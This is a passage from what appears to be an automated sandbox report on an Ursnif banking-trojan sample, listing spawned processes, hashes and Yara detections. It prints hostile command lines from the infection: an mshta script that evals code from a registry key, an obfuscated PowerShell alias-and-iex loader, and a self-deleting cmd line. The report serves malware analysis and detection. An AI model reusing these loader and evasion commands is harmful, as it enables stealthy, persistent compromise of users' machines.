                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:4
                                  Start time:11:17:24
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:8
                                  Start time:11:17:28
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:23
                                  Start time:11:18:04
                                  Start date:25/05/2022
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440
                                  Imagebase:0x12a0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:25
                                  Start time:11:18:06
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                  Imagebase:0x7ff74ed60000
                                  File size:14848 bytes
                                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Target ID:26
                                  Start time:11:18:09
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                  Imagebase:0x7ff6ba650000
                                  File size:447488 bytes
                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:27
                                  Start time:11:18:09
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff647620000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:28
                                  Start time:11:18:19
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
                                  Imagebase:0x7ff792450000
                                  File size:2739304 bytes
                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  General

                                  Target ID:29
                                  Start time:11:18:21
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
                                  Imagebase:0x7ff607f30000
                                  File size:47280 bytes
                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:31
                                  Start time:11:18:24
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
                                  Imagebase:0x7ff792450000
                                  File size:2739304 bytes
                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET

                                  General

                                  Target ID:32
                                  Start time:11:18:26
                                  Start date:25/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
                                  Imagebase:0x7ff607f30000
                                  File size:47280 bytes
                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:33
                                  Start time:11:18:27
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\control.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\control.exe -h
                                  Imagebase:0x7ff78e810000
                                  File size:117760 bytes
                                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                  General

                                  Target ID:35
                                  Start time:11:18:36
                                  Start date:25/05/2022
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff6f3b00000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:42
                                  Start time:11:18:56
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll
                                  Imagebase:0x7ff7bb450000
                                  File size:273920 bytes
                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:43
                                  Start time:11:18:57
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff647620000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  General

                                  Target ID:44
                                  Start time:11:18:58
                                  Start date:25/05/2022
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping localhost -n 5
                                  Imagebase:0x7ff6219d0000
                                  File size:21504 bytes
                                  MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Disassembly

                                  No disassembly